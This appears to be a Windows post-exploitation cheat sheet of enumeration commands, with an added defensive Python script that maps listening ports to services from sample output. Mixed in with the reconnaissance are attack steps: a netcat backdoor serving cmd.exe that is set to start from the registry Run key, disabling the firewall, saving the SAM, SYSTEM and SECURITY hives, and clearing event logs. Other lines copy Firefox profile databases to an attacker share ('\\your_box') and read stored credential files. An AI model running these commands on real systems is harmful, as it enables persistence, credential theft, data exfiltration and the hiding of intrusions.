Windows Enum
Basic Enumeration
Manual commands
#info
hostname
systeminfo
#Hot Fix installations
wmic qfe get Caption,Description,HotFixID,InstalledOn
#Eula
type C:\Windows\System32\eula.txt
#Query state of Firewall, Disable Firewall, Allow a Service Through
#Query state of firewall:
netsh firewall show state
#Disable firewall
netsh.exe firewall set opmode mode=disable profile=all
#Allow service through firewall
netsh.exe firewall set portopening tcp 123 MYSERVICE enable all
netsh.exe firewall set allowedprogram C:\MYPROGRAM.exe
reg add HKLM\software\microsoft\windows\currentversion\run /d "C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe" /v netcat
netsh firewall set allowedprogram c:\nc.exe allow_nc ENABLE
#Query current user and privilege information
whoami
whoami /all
whoami /user
whoami /groups
whoami /priv
[Users]
net users: list users
For more info on a user:
net user <username> (for a local user)
net user <username> /domain (for a domain user)
#View domain admins:
net group "Domain Admins" /domain
#View name of domain controller:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DC
#Add user:
net user <username> <password> /add
#Add user to local administrators group:
net localgroup administrators <username> /add
#Delete a user:
net user <username> /delete /domain
#Change user's password:
net user <username> <newpassword>
[Accounts & Groups]
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain
net group "domain Admins" /domain
net group "Enterprise Admins" /domain
net view /localgroup
net localgroup Administrators
net localgroup /Domain
gpresult: view group policy
gpupdate: update group policy
gpresult /z
[Network and misc information]
systeminfo: lists information about system
ipconfig /all: query IP configuration
ipconfig /displaydns
# Prints machines routing table
route print
# Lists all systems currently in the machine's ARP table
arp -a
# Query server information
nslookup
# Displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP
nbtstat
# Query info about RDP sessions
qwinsta
# Query session information
net session
net time \\computername # (shows the time of the target computer)
# view shared resources on network
net share
#[Query current drives on system]
fsutil fsinfo drives
#[Grab SAM and SYSTEM files]
type "C:/windows/repair/SAM"
type "C:/windows/repair/SYSTEM"
#[Tasks]
tasklist /svc: lists running processes
taskkill /PID <pid> /F: forcibly kill a task by PID
taskkill /IM <process_name>: kill all processes with the same image name
tasklist /V /S computername: lists tasks with the users running them on a remote system. This removes any IPC$ connection after it is done, so if you are using another user you need to re-initiate the IPC$ mount
qprocess *: similar to tasklist but easier to read
at: Query current scheduled tasks
schtasks: Query scheduled tasks that your current user has access to see.
schtasks /query /fo csv /v > %TEMP%\schtasks.csv
[Netstat]
netstat -ano : to see what services are running on what ports
netstat -bano
netstat -r
netstat -na | findstr :443
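The -o switch in netstat -ano only gives a PID; joining it with tasklist /svc is what turns a listening port into a service name. The following Python script is an added example (not part of the original cheat sheet) that performs that join over constructed sample output of both commands, so a defender can inventory which image and service owns each listening socket.

```python
import re
# Constructed sample output of "netstat -ano" (not captured from a real host).
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    192.168.1.10:49712     192.168.1.20:443       ESTABLISHED     2216
  UDP    0.0.0.0:123            *:*                                    1344
"""
# Constructed sample output of "tasklist /svc" for the same PIDs.
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
svchost.exe                    908 RpcEptMapper, RpcSs
svchost.exe                   1204 TermService
svchost.exe                   1344 W32Time
firefox.exe                   2216 N/A
"""

def parse_tasklist_svc(text):
    """Map PID -> (image name, [service names]) from 'tasklist /svc' output."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^(\S.*?)\s+(\d+)\s+(.*)$", line.strip())
        if m:  # header and separator rows carry no PID digits, so they are skipped
            svcs = [] if m.group(3) == "N/A" else m.group(3).split(", ")
            procs[int(m.group(2))] = (m.group(1), svcs)
    return procs

def parse_netstat(text):
    """Parse 'netstat -ano' rows; UDP rows have no State column, PID is always last."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if parts and parts[0] in ("TCP", "UDP"):
            addr, port = parts[1].rsplit(":", 1)  # also splits [::]:port correctly
            rows.append({"proto": parts[0], "addr": addr, "port": int(port),
                         "state": parts[3] if parts[0] == "TCP" else "",
                         "pid": int(parts[-1])})
    return rows

def listening_inventory(netstat_text, tasklist_text):
    """Listening TCP sockets plus all UDP sockets, joined to owning image and services."""
    procs = parse_tasklist_svc(tasklist_text)
    inv = []
    for r in parse_netstat(netstat_text):
        if r["proto"] == "UDP" or r["state"] == "LISTENING":
            image, svcs = procs.get(r["pid"], ("<unknown>", []))
            inv.append((r["proto"], r["port"], r["addr"], image, svcs))
    return sorted(inv)
```

On a real host, feed the script the saved output of the two commands; a port whose PID resolves to "<unknown>" or to an image with no service is the line worth investigating.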
[Query information about server and workstation, Workstation domain name and Logon domain]
net config server
net config workstation
[Change drive to different drive letter]
e.g. change to the D: drive and list its contents:
d: & dir
cd /d d: & dir
dir \\computername\share_or_admin_share (list a remote directory)
[Cat contents of file located in D:/ directory]
cd /d & type d:\blah\blah
[net view]
net view /domain[:DomainName]
net view \\computerName
[Services]
View services and programs started at startup:
net start
wmic startup get caption,command
[Query, Stop/Start/Pause Installed Services]
sc query state= all
sc query
sc
[Remote System Access]
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername
[WMI]
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create "process_name" (executes a program)
wmic process where name="process_name" call terminate (terminates a program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (use ? to get help)
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
[Reg Command]
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save SAM to a file)
reg add [\\TargetIPaddr\][RegDomain][\Key]
reg export [RegDomain][\Key] [FileName]
reg import [FileName]
reg query [\\TargetIPaddr\][RegDomain][\Key] /v [ValueName] (add /s to recurse through all subkeys and values)
[Deleting Logs]
wevtutil el (list logs)
wevtutil cl <logname> (clear a log)
[Uninstalling Software]
wmic product get name /value: gets software names
wmic product where name="XXX" call uninstall /Interactive:Off: uninstalls software
[Permissions]
icacls
Grant full access over directory and encompassing folders and files:
icacls "C:\windows" /grant Administrator:F /T
icacls "C:\" /grant "nt authority\system":F /T
[Net use]
net use: Map network shares
net use \\computername (maps IPC$, which does not show up as a drive)
net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username)
[Mount a remote share with the rights of the current user]:
net use K: \\
dir K:
[Enable remote desktop]
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net session: list session information
[Other useful Commands]
pkgmgr /iu:"Package"
pkgmgr /iu:"TelnetServer": install telnet service
pkgmgr /iu:"TelnetClient"
rundll32.exe user32.dll,LockWorkStation: locks the screen
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box
type "C:\documents and settings\administrator\userdata\index.dat"
type %WINDIR%\System32\drivers\etc\hosts: view contents of hosts files
type "c:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials"
cd "C:\Documents and Settings\administrator\userdata" & dir
type "c:\Documents and Settings\Administrator\Desktop\UserMysql.txt"
type "c:\Documents and Settings\Administrator\Application Data\MySQL\mysqlx_user_connections.xml"